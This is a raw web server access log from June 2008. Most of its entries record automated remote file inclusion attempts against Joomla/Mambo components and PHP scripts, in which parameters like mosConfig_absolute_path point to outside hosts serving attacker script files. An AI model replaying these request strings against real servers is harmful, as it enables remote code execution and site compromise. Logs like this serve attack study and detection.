62.2.100.138 - - [25/Jun/2008:10:02:56 -0700] "GET /index.php?go=http://www.wkhm.com/css/spread.txt?http://venera.pksola.si/test1/components/com_rwcards/js/lib/idilegal.txt??? HTTP/1.1" 200 18583 "-" "libwww-perl/5.803" "www.dmulk.com"
66.80.93.168 - - [25/Jun/2008:10:03:14 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [25/Jun/2008:10:03:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [25/Jun/2008:10:03:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:03:30 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:03:31 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:03:31 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:10:03:53 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:10:04:01 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:04:18 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:10:04:18 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:04:26 -0700] "GET /logs/access_080117.log/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:04:27 -0700] "GET /logs/access_080117.log/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:04:28 -0700] "GET /logs/access_080225.log//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:04:40 -0700] "GET /logs/access_080117.log/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:04:42 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:04:43 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:04:43 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:10:05:01 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:05:03 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:05:03 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:05:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:05:03 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:05:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:05:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:05:08 -0700] "GET /logs/access_080117.log/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:05:09 -0700] "GET /index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:10:05:09 -0700] "GET /logs/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:10:05:17 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:05:27 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:05:28 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:05:29 -0700] "GET /logs/access_080211.log/scanhttp://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:06:00 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:10:06:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:10:06:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [25/Jun/2008:10:06:26 -0700] "GET /logs/!ascanhttp://samurai.tuxfamily.org/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.194.90.180 - - [25/Jun/2008:10:06:26 -0700] "GET /!ascanhttp://samurai.tuxfamily.org/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:06:51 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:06:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:06:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:10:06:53 -0700] "GET /logs/access_080110.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:10:06:59 -0700] "GET /logs/access_080304.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:06:59 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:10:07:13 -0700] "GET /logs/access_080307.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:07:20 -0700] "GET /logs/access_080213.log//main.php?sayfa=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:07:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
91.194.90.180 - - [25/Jun/2008:10:07:35 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://samurai.tuxfamily.org/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.227.251.172 - - [25/Jun/2008:10:08:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.84.186 - - [25/Jun/2008:10:08:37 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.179.12 - - [25/Jun/2008:10:09:06 -0700] "GET /logs/access_080312.log//include.php?path=http://210.118.194.173/cj/rfi/22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:10:09:29 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [25/Jun/2008:10:09:30 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:10:09:31 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.6.17.170 - - [25/Jun/2008:10:09:54 -0700] "GET /blog/index.php/2008/06/07/ HTTP/1.0" 200 8164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:10:02 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:10:29 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:10:10:29 -0700] "GET /logs/access_080211.log//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:10:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:10:10:29 -0700] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:10:29 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:10:10:29 -0700] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:10:10:35 -0700] "GET /logs/access_080312.log//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:10:10:43 -0700] "GET /logs/index.php?go=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:10:10:44 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:10:10:45 -0700] "GET /index.php?go=http://208.46.111.12/images/images.txt?? HTTP/1.1" 200 18399 "-" "libwww-perl/5.79" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:10:11:30 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:12:38 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:10:12:57 -0700] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:10:12:57 -0700] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:13:19 -0700] "GET /logs/access_080312.log//include.php?path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:13:20 -0700] "GET //include.php?path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:13:20 -0700] "GET /logs//include.php?path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.195.51.254 - - [25/Jun/2008:10:13:27 -0700] "GET /blog/index.php/2008/06/?show=gallery HTTP/1.0" 200 48121 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
69.20.61.23 - - [25/Jun/2008:10:13:53 -0700] "GET /logs/access_080215.log//include.php?path=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:14:52 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.206.158.231 - - [25/Jun/2008:10:14:52 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.170 - - [25/Jun/2008:10:15:43 -0700] "GET /blog/wp-content/uploads/?M=A HTTP/1.0" 200 3057 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.52.139.226 - - [25/Jun/2008:10:16:26 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:10:16:26 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.52.118 - - [25/Jun/2008:10:16:43 -0700] "GET /blog/index.php/2008/06/?show=gallery&nggpage=2 HTTP/1.0" 200 30587 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:16:59 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:17:07 -0700] "GET /logs/access_080117.log/index.php?pg=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:17:10 -0700] "GET /index.php?pg=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 18415 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:10:17:10 -0700] "GET /logs/index.php?pg=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:10:17:25 -0700] "GET /logs/access_080108.log//1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:10:17:27 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:10:17:27 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:18:27 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:18:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.31.206.138 - - [25/Jun/2008:10:18:29 -0700] "GET /logs/access_071224.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.206.138 - - [25/Jun/2008:10:18:30 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.31.206.138 - - [25/Jun/2008:10:18:31 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:10:18:42 -0700] "GET /logs/access_080325.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:10:18:51 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:10:18:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:10:18:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.179.12 - - [25/Jun/2008:10:18:53 -0700] "GET //include.php?path=http://210.118.194.173/cj/rfi/22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.55.48.7 - - [25/Jun/2008:10:19:19 -0700] "GET /logs/access_080312.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:10:19:24 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:10:19:39 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.87.251.48 - - [25/Jun/2008:10:19:41 -0700] "GET /logs/access_080118.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.48 - - [25/Jun/2008:10:19:42 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.48 - - [25/Jun/2008:10:19:42 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:10:19:44 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.223.106.116 - - [25/Jun/2008:10:19:51 -0700] "GET //skin/zero_vote/error.php?dir=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:10:20:23 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:20:32 -0700] "GET /logs/access_080218.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:20:32 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:10:20:33 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:10:21:13 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
